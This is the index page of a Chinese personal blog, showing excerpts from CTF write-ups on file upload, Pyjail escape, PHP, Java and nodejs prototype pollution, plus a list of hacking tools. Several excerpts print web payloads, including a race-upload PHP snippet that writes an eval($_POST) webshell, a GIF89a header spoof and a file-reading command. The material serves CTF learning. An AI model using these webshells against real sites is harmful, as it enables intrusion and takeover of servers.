suny
  • 首页
  • 归档
  • 分类
  • 标签
  • 关于
  • 友链

常用资源汇总

常用资源汇总由于本人脑子不好使,经常忘一些东西,故写篇文章汇总一些资源以便随时使用。 命令类GitfastbootADB 工具类Arjun sqlmap fenjing flask-session-cookie-manager fastcoll
2025-11-01
汇总

ctfshow

文件上传web161-163文件头伪造1GIF89a 竞争上传123<?php$f=fopen("7.php","w");fputs($f,'<?php eval($_POST[7]);?>');?> web164上传一个正常的图片,发现查看图片的时候存在文件包含漏洞,打一个图片马 12345678910111
2026-03-24

Pyjail沙箱逃逸

引子[SHCTF_3rd]Eazy_Pyrunner通过任意文件读取漏洞我们可以读到源代码 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818
2026-03-23

SHCTF第三届山河杯

[阶段1] Ezphp这里还是知识欠缺了,最后读文件用的是php的原生类:( 基本的链子会写,关键就是最后一步原生类的利用 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768<?phphig
2026-03-21

PolarCTF2026春季赛

平台和💩一样 新年贺卡当action=admin的时候可以添加模版,并且保存的格式是php 所以我们上传一个shell.php,内容是一句话木马 猜测TEMPLATE_DIR 是templates,访问http://xxx/templates/shell.php 预期解应该是传一个php 1echo `cat /f*` 然后生成并下载贺卡,在生成的时候就会加载模版文件 并发上传题目名
2026-03-20

DSBCTF单身杯

好玩的PHP123456789101112131415161718192021222324252627282930<?php error_reporting(0); highlight_file(__FILE__); class ctfshow { private $d = ''; private $s = 
2026-03-19
XGCTF西瓜杯

XGCTF西瓜杯

CodeInject12345678<?php#Author: h1xaerror_reporting(0);show_source(__FILE__);eval("var_dump((Object)$_POST[1]);"); 尝试闭合注入 tpdoor第一次做ThinkPHP,先用ai分析一下源码 123456789101112131415161718192021
2026-03-15
CTF
XYCTF2025&furryCTF2025

XYCTF2025&furryCTF2025

Fate1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980import flaskimport sqlite3import requestsimpo
2026-03-13
CTF
初探Java

初探Java

通过几个题目入门Java [网鼎杯 2020 朱雀组]Think Java题目给出了部分源码,先看Test.class 1234567891011121314import io.swagger.annotations.ApiOperation; //使用了swagger进行接口的测试@CrossOrigin@RestController //标识这是一个控制器,且返回值直接序列化为 JSON
2026-03-09
CTF
nodejs原型链污染

nodejs原型链污染

java学不明白跑来学js了 :( 前置知识js中每个函数实际上都是一个Function对象,所以一个方法的原型就是一个方法对象 每个实例对象都有一个私有属性(_proto_)指向它的构造函数的原型对象(prototype)。当一个类实例化的时候,赋值的变量会继承prototype的所有内容,包括变量以及方法 那么我们不难总结出: 1.prototype是一个类的属性,当该类实例化时会继承pro
2026-03-04
CTF
1234

搜索

萌ICP备20250279号
Hexo Fluid